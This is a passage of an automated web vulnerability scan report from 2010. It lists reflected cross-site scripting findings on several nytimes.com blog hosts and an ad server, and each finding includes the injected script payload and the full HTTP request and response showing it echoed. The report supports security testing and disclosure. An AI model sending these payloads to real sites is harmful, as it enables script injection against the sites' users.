<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/denzel-washington69bb6\"><script>alert(1)</script>38050bcc525&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.53. http://artsbeat.blogs.nytimes.com/tag/hip-hop/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/hip-hop/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e7b7"><script>alert(1)</script>58c4fa3e928 was submitted in the REST URL parameter 2. This input was echoed as 1e7b7\"><script>alert(1)</script>58c4fa3e928 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/hip-hop1e7b7"><script>alert(1)</script>58c4fa3e928/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/hip-hop1e7b7\"><script>alert(1)</script>58c4fa3e928&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.54. http://artsbeat.blogs.nytimes.com/tag/james-levine/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/james-levine/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71b07"><script>alert(1)</script>db7048b06c8 was submitted in the REST URL parameter 2. This input was echoed as 71b07\"><script>alert(1)</script>db7048b06c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/james-levine71b07"><script>alert(1)</script>db7048b06c8/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/james-levine71b07\"><script>alert(1)</script>db7048b06c8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.55. http://artsbeat.blogs.nytimes.com/tag/kanye-west/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/kanye-west/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14892"><script>alert(1)</script>f62c755879a was submitted in the REST URL parameter 2. This input was echoed as 14892\"><script>alert(1)</script>f62c755879a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/kanye-west14892"><script>alert(1)</script>f62c755879a/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/kanye-west14892\"><script>alert(1)</script>f62c755879a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.56. http://artsbeat.blogs.nytimes.com/tag/matt-lauer/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/matt-lauer/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a44"><script>alert(1)</script>7a33a3a08b8 was submitted in the REST URL parameter 2. This input was echoed as d3a44\"><script>alert(1)</script>7a33a3a08b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/matt-lauerd3a44"><script>alert(1)</script>7a33a3a08b8/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/matt-lauerd3a44\"><script>alert(1)</script>7a33a3a08b8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.57. http://artsbeat.blogs.nytimes.com/tag/metropolitan-opera/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/metropolitan-opera/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72636"><script>alert(1)</script>fe25915fda2 was submitted in the REST URL parameter 2. This input was echoed as 72636\"><script>alert(1)</script>fe25915fda2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/metropolitan-opera72636"><script>alert(1)</script>fe25915fda2/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/metropolitan-opera72636\"><script>alert(1)</script>fe25915fda2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.58. http://artsbeat.blogs.nytimes.com/tag/rubicon/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/rubicon/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df76"><script>alert(1)</script>36a7ef473d7 was submitted in the REST URL parameter 2. This input was echoed as 8df76\"><script>alert(1)</script>36a7ef473d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/rubicon8df76"><script>alert(1)</script>36a7ef473d7/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/rubicon8df76\"><script>alert(1)</script>36a7ef473d7&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.59. http://artsbeat.blogs.nytimes.com/tag/the-nutcracker-chronicles/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/the-nutcracker-chronicles/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8d81"><script>alert(1)</script>c72ce13dac8 was submitted in the REST URL parameter 2. This input was echoed as c8d81\"><script>alert(1)</script>c72ce13dac8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/the-nutcracker-chroniclesc8d81"><script>alert(1)</script>c72ce13dac8/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/the-nutcracker-chroniclesc8d81\"><script>alert(1)</script>c72ce13dac8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.60. http://artsbeat.blogs.nytimes.com/tag/today/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/today/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de2b9"><script>alert(1)</script>a5cf14ef85b was submitted in the REST URL parameter 2. This input was echoed as de2b9\"><script>alert(1)</script>a5cf14ef85b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/todayde2b9"><script>alert(1)</script>a5cf14ef85b/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/todayde2b9\"><script>alert(1)</script>a5cf14ef85b&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.61. http://artsbeat.blogs.nytimes.com/tag/tony-scott/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/tony-scott/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 759e8"><script>alert(1)</script>ffce1e028bf was submitted in the REST URL parameter 2. This input was echoed as 759e8\"><script>alert(1)</script>ffce1e028bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/tony-scott759e8"><script>alert(1)</script>ffce1e028bf/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/tony-scott759e8\"><script>alert(1)</script>ffce1e028bf&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.62. http://artsbeat.blogs.nytimes.com/tag/unstoppable/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/unstoppable/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ebc"><script>alert(1)</script>69d455abf66 was submitted in the REST URL parameter 2. This input was echoed as 57ebc\"><script>alert(1)</script>69d455abf66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/unstoppable57ebc"><script>alert(1)</script>69d455abf66/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/unstoppable57ebc\"><script>alert(1)</script>69d455abf66&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.63. http://artsbeat.blogs.nytimes.com/tag/week-in-culture-pictures/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://artsbeat.blogs.nytimes.com
Path:	/tag/week-in-culture-pictures/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46998"><script>alert(1)</script>93dbc148a41 was submitted in the REST URL parameter 2. This input was echoed as 46998\"><script>alert(1)</script>93dbc148a41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/week-in-culture-pictures46998"><script>alert(1)</script>93dbc148a41/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/week-in-culture-pictures46998\"><script>alert(1)</script>93dbc148a41&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.64. http://atwar.blogs.nytimes.com/2010/11/12/the-state-of-schools-in-swat/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://atwar.blogs.nytimes.com
Path:	/2010/11/12/the-state-of-schools-in-swat/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 810f2"><script>alert(1)</script>3ec6b036ff6 was submitted in the src parameter. This input was echoed as 810f2\"><script>alert(1)</script>3ec6b036ff6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/the-state-of-schools-in-swat/?src=twr810f2"><script>alert(1)</script>3ec6b036ff6 HTTP/1.1
Host: atwar.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:59:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://atwar.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
SIDE&query=qstring&keywords=Iraq+War;Afghanistan+War;Baghdad;Kandahar;Kabul;Pakistan;Swat+Valley;U.S.+military;troops;Taliban;Al+Qaeda;Shiite;Sunni+and+Kurd;af-pak;education;girls;pakistan;swat&src=twr810f2\"><script>alert(1)</script>3ec6b036ff6">
...[SNIP]...

3.65. http://bits.blogs.nytimes.com/2010/11/12/facebook-to-start-an-e-mail-service/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bits.blogs.nytimes.com
Path:	/2010/11/12/facebook-to-start-an-e-mail-service/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 720b9"><script>alert(1)</script>0cd621483e2 was submitted in the src parameter. This input was echoed as 720b9\"><script>alert(1)</script>0cd621483e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/facebook-to-start-an-e-mail-service/?src=twr720b9"><script>alert(1)</script>0cd621483e2 HTTP/1.1
Host: bits.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:59:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://bits.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Technology;Start-Ups;Internet;Enterprise;Gadgets;company-news;e-mail;facebook;internet;social-networking&src=twr720b9\"><script>alert(1)</script>0cd621483e2">
...[SNIP]...

3.66. http://bs.serving-sys.com/BurstingPipe/adServer.bs [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the h request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 550d0%3balert(1)//2f013fc219c was submitted in the h parameter. This input was echoed as 550d0;alert(1)//2f013fc219c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250550d0%3balert(1)//2f013fc219c&ord=2010.11.13.01.44.23&ucm=true&z=0 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Connection: close
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
